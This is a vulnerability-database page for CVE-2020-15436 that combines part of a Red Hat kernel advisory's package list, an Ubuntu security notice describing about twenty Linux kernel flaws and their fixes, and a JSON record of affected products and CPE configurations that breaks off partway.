x86_64: bpftool-3.10.0-1160.15.2.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm kernel-3.10.0-1160.15.2.el7.x86_64.rpm kernel-debug-3.10.0-1160.15.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm kernel-debug-devel-3.10.0-1160.15.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.15.2.el7.x86_64.rpm kernel-devel-3.10.0-1160.15.2.el7.x86_64.rpm kernel-headers-3.10.0-1160.15.2.el7.x86_64.rpm kernel-tools-3.10.0-1160.15.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm kernel-tools-libs-3.10.0-1160.15.2.el7.x86_64.rpm perf-3.10.0-1160.15.2.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm python-perf-3.10.0-1160.15.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64: bpftool-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.15.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-1160.15.2.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source: kernel-3.10.0-1160.15.2.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-1160.15.2.el7.noarch.rpm kernel-doc-3.10.0-1160.15.2.el7.noarch.rpm

ppc64: bpftool-3.10.0-1160.15.2.el7.ppc64.rpm bpftool-debuginfo-3.10.0-1160.15.2.el7.ppc64.rpm kernel-3.10.0-1160.15.2.el7.ppc64.rpm kernel-bootwrapper-3.10.0-1160.15.2.el7.ppc64.rpm kernel-debug-3.10.0-1160.15.2.el7.ppc64.rpm kernel-debug-debuginfo-3.10.0-1160.15.2.el7.ppc64.rpm kernel-debug-devel-3.10.0-1160.15.2.el7.ppc64.rpm kernel-debuginfo-3.10.0-1160.15.2.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-1160.15.2.el7.ppc64.rpm kernel-devel-3.10.0-1160.15.2.el7.ppc64.rpm kernel-headers-3.10.0-1160.15.2.el7.ppc64.rpm kernel-tools-3.10.0-1160.15.2.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-1160.15.2.el7.ppc64.rpm kernel-tools-libs-3.10.0-1160.15.2.el7.ppc64.rpm perf-3.10.0-1160.15.2.el7.ppc64.rpm perf-debuginfo-3.10.0-1160.15.2.el7.ppc64.rpm python-perf-3.10.0-1160.15.2.el7.ppc64.rpm python-perf-debuginfo-3.10.0-1160.15.2.el7.ppc64.rpm

ppc64le: bpftool-3.10.0-1160.15.2.el7.ppc64le.rpm bpftool-debuginfo-3.10.0-1160.15.2.el7.ppc64le.rpm kernel-3.10.0-1160.15.2.el7.ppc64le.rpm kernel-bootwrapper-3.10.0-1160.15.2.el7.ppc64le.rpm kernel-debug-3.10.0-1160.15.2.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-1160.15.2.el7.ppc64le.rpm kernel-debuginfo-3.10.0-1160.15.2.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-1160.15.2.el7.ppc64le.rpm kernel-devel-3.10.0-1160.15.2.el7.ppc64le.rpm kernel-headers-3.10.0-1160.15.2.el7.ppc64le.rpm kernel-tools-3.10.0-1160.15.2.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-1160.15.2.el7.ppc64le.rpm kernel-tools-libs-3.10.0-1160.15.2.el7.ppc64le.rpm perf-3.10.0-1160.15.2.el7.ppc64le.rpm perf-debuginfo-3.10.0-1160.15.2.el7.ppc64le.rpm python-perf-3.10.0-1160.15.2.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-1160.15.2.el7.ppc64le.rpm

s390x: bpftool-3.10.0-1160.15.2.el7.s390x.rpm bpftool-debuginfo-3.10.0-1160.15.2.el7.s390x.rpm kernel-3.10.0-1160.15.2.el7.s390x.rpm kernel-debug-3.10.0-1160.15.2.el7.s390x.rpm kernel-debug-debuginfo-3.10.0-1160.15.2.el7.s390x.rpm kernel-debug-devel-3.10.0-1160.15.2.el7.s390x.rpm kernel-debuginfo-3.10.0-1160.15.2.el7.s390x.rpm kernel-debuginfo-common-s390x-3.10.0-1160.15.2.el7.s390x.rpm kernel-devel-3.10.0-1160.15.2.el7.s390x.rpm kernel-headers-3.10.0-1160.15.2.el7.s390x.rpm kernel-kdump-3.10.0-1160.15.2.el7.s390x.rpm kernel-kdump-debuginfo-3.10.0-1160.15.2.el7.s390x.rpm kernel-kdump-devel-3.10.0-1160.15.2.el7.s390x.rpm perf-3.10.0-1160.15.2.el7.s390x.rpm perf-debuginfo-3.10.0-1160.15.2.el7.s390x.rpm python-perf-3.10.0-1160.15.2.el7.s390x.rpm python-perf-debuginfo-3.10.0-1160.15.2.el7.s390x.rpm

x86_64: bpftool-3.10.0-1160.15.2.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm kernel-3.10.0-1160.15.2.el7.x86_64.rpm kernel-debug-3.10.0-1160.15.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm kernel-debug-devel-3.10.0-1160.15.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.15.2.el7.x86_64.rpm kernel-devel-3.10.0-1160.15.2.el7.x86_64.rpm kernel-headers-3.10.0-1160.15.2.el7.x86_64.rpm kernel-tools-3.10.0-1160.15.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm kernel-tools-libs-3.10.0-1160.15.2.el7.x86_64.rpm perf-3.10.0-1160.15.2.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm python-perf-3.10.0-1160.15.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64: bpftool-debuginfo-3.10.0-1160.15.2.el7.ppc64.rpm kernel-debug-debuginfo-3.10.0-1160.15.2.el7.ppc64.rpm kernel-debuginfo-3.10.0-1160.15.2.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-1160.15.2.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-1160.15.2.el7.ppc64.rpm kernel-tools-libs-devel-3.10.0-1160.15.2.el7.ppc64.rpm perf-debuginfo-3.10.0-1160.15.2.el7.ppc64.rpm python-perf-debuginfo-3.10.0-1160.15.2.el7.ppc64.rpm

ppc64le: bpftool-debuginfo-3.10.0-1160.15.2.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-1160.15.2.el7.ppc64le.rpm kernel-debug-devel-3.10.0-1160.15.2.el7.ppc64le.rpm kernel-debuginfo-3.10.0-1160.15.2.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-1160.15.2.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-1160.15.2.el7.ppc64le.rpm kernel-tools-libs-devel-3.10.0-1160.15.2.el7.ppc64le.rpm perf-debuginfo-3.10.0-1160.15.2.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-1160.15.2.el7.ppc64le.rpm

x86_64: bpftool-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.15.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-1160.15.2.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source: kernel-3.10.0-1160.15.2.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-1160.15.2.el7.noarch.rpm kernel-doc-3.10.0-1160.15.2.el7.noarch.rpm

x86_64: bpftool-3.10.0-1160.15.2.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm kernel-3.10.0-1160.15.2.el7.x86_64.rpm kernel-debug-3.10.0-1160.15.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm kernel-debug-devel-3.10.0-1160.15.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.15.2.el7.x86_64.rpm kernel-devel-3.10.0-1160.15.2.el7.x86_64.rpm kernel-headers-3.10.0-1160.15.2.el7.x86_64.rpm kernel-tools-3.10.0-1160.15.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm kernel-tools-libs-3.10.0-1160.15.2.el7.x86_64.rpm perf-3.10.0-1160.15.2.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm python-perf-3.10.0-1160.15.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64: bpftool-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.15.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-1160.15.2.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iQIVAwUBYBlBsdzjgjWX9erEAQhTZhAAmSFzEZeB0CWYNaJ2PVwoFm4PA9rdYDyg G1j/plxrO6bczNEz+XDnAzRPrCbJRPPt6VJxjpLkb25ph0f5tQ+Q7Ph7sAefSbDX BLDjjvl+Wd1g2FEfIQ43wDp8UWuFCVVMF3ajJHFz9ROqrA/1hs0gj7ht9gXRlttT LSI67A08tEWRPtaf5c1M8h/IJtZiF4sfYDrfhp4mFRTZYybTvVjML+xf69Qq7o2D AsxbyKRVNQKC0Epm6C+Tzbw6SxhonrAQyjADWenQ8bCS2TF8WY2OZA7sNs7nddZu Ha/mCB2vSR2WCWLGxCLXTtsK3y52qPIyUn4mBmatJUIBcbJMnQbgZgWrEcTobsoD N5MWdqE6xGjct0KMz0fV6J9D5JWQjUN4O8K0vVQP4aoAX25jMWCq14RLLRUvusJm dLI59E5nN1pLMlADiAAh2Iceac/daIF9fvWn2XoF16/ZQNffa0yCiNFaDg+AW4Tg Z/b82VoOiz7uJWyv06TMcljafEaIxjpnjGmpKQ2qz8UYoxYYsnRyKpHJxLeiB53A TKbkiQJoFutNeUcbBSA6F6sqLlaJ7CtoyzxsVVwM+LtYF1iUXqC+Hp6Gs5NB8WXr JQSrrv0X0H7sAu7FHCyL/ygMQK/IiZKiPxiRBZJH6pJz5OL8GVKxR1CSZmHXvgKo QPLPtfMOGPs=Hdxh -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . 7) - aarch64, noarch, ppc64le

  1. ========================================================================== Ubuntu Security Notice USN-4752-1 February 25, 2021

linux-oem-5.6 vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description: - linux-oem-5.6: Linux kernel for OEM systems

Details:

Daniele Antonioli, Nils Ole Tippenhauer, and Kasper Rasmussen discovered that legacy pairing and secure-connections pairing authentication in the Bluetooth protocol could allow an unauthenticated user to complete authentication without pairing credentials via adjacent access. A physically proximate attacker could use this to impersonate a previously paired Bluetooth device. (CVE-2020-10135)

Jay Shin discovered that the ext4 file system implementation in the Linux kernel did not properly handle directory access with broken indexing, leading to an out-of-bounds read vulnerability. A local attacker could use this to cause a denial of service (system crash). (CVE-2020-14314)

It was discovered that the block layer implementation in the Linux kernel did not properly perform reference counting in some situations, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash). (CVE-2020-15436)

It was discovered that the serial port driver in the Linux kernel did not properly initialize a pointer in some situations. A local attacker could possibly use this to cause a denial of service (system crash). (CVE-2020-15437)

Andy Nguyen discovered that the Bluetooth HCI event packet parser in the Linux kernel did not properly handle event advertisements of certain sizes, leading to a heap-based buffer overflow. A physically proximate remote attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2020-24490)

It was discovered that the NFS client implementation in the Linux kernel did not properly perform bounds checking before copying security labels in some situations. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2020-25212)

It was discovered that the Rados block device (rbd) driver in the Linux kernel did not properly perform privilege checks for access to rbd devices in some situations. A local attacker could use this to map or unmap rbd block devices. (CVE-2020-25284)

It was discovered that the block layer subsystem in the Linux kernel did not properly handle zero-length requests. A local attacker could use this to cause a denial of service. (CVE-2020-25641)

It was discovered that the HDLC PPP implementation in the Linux kernel did not properly validate input in some situations. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2020-25643)

Kiyin (尹亮) discovered that the perf subsystem in the Linux kernel did not properly deallocate memory in some situations. A privileged attacker could use this to cause a denial of service (kernel memory exhaustion). (CVE-2020-25704)

It was discovered that the KVM hypervisor in the Linux kernel did not properly handle interrupts in certain situations. A local attacker in a guest VM could possibly use this to cause a denial of service (host system crash). (CVE-2020-27152)

It was discovered that the jfs file system implementation in the Linux kernel contained an out-of-bounds read vulnerability. A local attacker could use this to possibly cause a denial of service (system crash). (CVE-2020-27815)

It was discovered that an information leak existed in the syscall implementation in the Linux kernel on 32 bit systems. A local attacker could use this to expose sensitive information (kernel memory). (CVE-2020-28588)

It was discovered that the framebuffer implementation in the Linux kernel did not properly perform range checks in certain situations. A local attacker could use this to expose sensitive information (kernel memory). (CVE-2020-28915)

Jann Horn discovered a race condition in the copy-on-write implementation in the Linux kernel when handling hugepages. A local attacker could use this to gain unintended write access to read-only memory pages. (CVE-2020-29368)

Jann Horn discovered that the mmap implementation in the Linux kernel contained a race condition when handling munmap() operations, leading to a read-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly expose sensitive information. (CVE-2020-29369)

Jann Horn discovered that the romfs file system in the Linux kernel did not properly validate file system meta-data, leading to an out-of-bounds read. An attacker could use this to construct a malicious romfs image that, when mounted, exposed sensitive information (kernel memory). (CVE-2020-29371)

Jann Horn discovered that the tty subsystem of the Linux kernel did not use consistent locking in some situations, leading to a read-after-free vulnerability. (CVE-2020-29660)

Jann Horn discovered a race condition in the tty subsystem of the Linux kernel in the locking for the TIOCSPGRP ioctl(), leading to a use-after- free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2020-29661)

It was discovered that a race condition existed that caused the Linux kernel to not properly restrict exit signal delivery. A local attacker could possibly use this to send signals to arbitrary processes. (CVE-2020-35508)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 20.04 LTS: linux-image-5.6.0-1048-oem 5.6.0-1048.52 linux-image-oem-20.04 5.6.0.1048.44

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.

References: https://usn.ubuntu.com/4752-1 CVE-2020-10135, CVE-2020-14314, CVE-2020-15436, CVE-2020-15437, CVE-2020-24490, CVE-2020-25212, CVE-2020-25284, CVE-2020-25641, CVE-2020-25643, CVE-2020-25704, CVE-2020-27152, CVE-2020-27815, CVE-2020-28588, CVE-2020-28915, CVE-2020-29368, CVE-2020-29369, CVE-2020-29371, CVE-2020-29660, CVE-2020-29661, CVE-2020-35508

Package Information: https://launchpad.net/ubuntu/+source/linux-oem-5.6/5.6.0-1048.52

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202011-0423",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19.130"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.5"
      },
      {
        "model": "fas 8300",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "aff a400",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h615c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h610c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "aff 500f",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4.229"
      },
      {
        "model": "aff 8700",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "aff 8300",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "fabric-attached storage a400",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.15"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.7.6"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.5"
      },
      {
        "model": "solidfire baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.38"
      },
      {
        "model": "solidfire \\\u0026 hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "brocade fabric operating system",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "broadcom",
        "version": null
      },
      {
        "model": "fas 8700",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "cloud backup",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "a700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "fas 500f",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14.186"
      },
      {
        "model": "h610s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.4.49"
      },
      {
        "model": "a250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9.229"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.20"
      },
      {
        "model": "h410c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "linux",
        "version": "5.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "linux",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-013950"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-15436"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.7.6",
                "versionStartIncluding": "5.5",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.4.49",
                "versionStartIncluding": "4.20",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.19.130",
                "versionStartIncluding": "4.15",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.14.186",
                "versionStartIncluding": "4.10",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.9.229",
                "versionStartIncluding": "4.5",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.4.229",
                "versionStartIncluding": "2.6.38",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:broadcom:brocade_fabric_operating_system_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:solidfire_\\\u0026_hci_management_node:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:solidfire_baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:solidfire_baseboard_management_controller:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h410c_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h410c:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h610c_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h610c:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h610s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h610s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h615c_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h615c:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:a700s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:a700s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:aff_8700_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:aff_8700:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:fas_8700_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:fas_8700:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
